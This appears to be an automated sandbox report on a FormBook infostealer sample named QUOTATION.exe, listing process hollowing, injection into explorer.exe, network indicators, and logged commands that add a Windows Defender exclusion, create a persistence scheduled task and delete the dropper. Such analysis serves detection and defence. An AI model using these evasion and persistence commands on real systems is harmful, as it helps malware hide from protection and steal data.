Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03264120 mov eax, dword ptr fs:[00000030h] 24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_03264120 mov ecx, dword ptr fs:[00000030h] 24_2_03264120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 24_2_0327513A mov eax, dword ptr fs:[00000030h] 24_2_0327513A
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\QUOTATION.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\QUOTATION.exe Code function: 17_2_0040ACF0 LdrLoadDll, 17_2_0040ACF0
Source: C:\Users\user\Desktop\QUOTATION.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.purelai.store
Source: C:\Windows\explorer.exe Network Connect: 208.51.62.42 80
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\QUOTATION.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1050000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\QUOTATION.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Users\user\Desktop\QUOTATION.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\QUOTATION.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\QUOTATION.exe Thread register set: target process: 3352
Source: C:\Users\user\Desktop\QUOTATION.exe Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3352
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"
Source: explorer.exe, 00000013.00000000.299565234.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000013.00000000.336419113.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000013.00000000.323444529.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000013.00000000.344152528.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.309030845.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Users\user\Desktop\QUOTATION.exe VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\QUOTATION.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY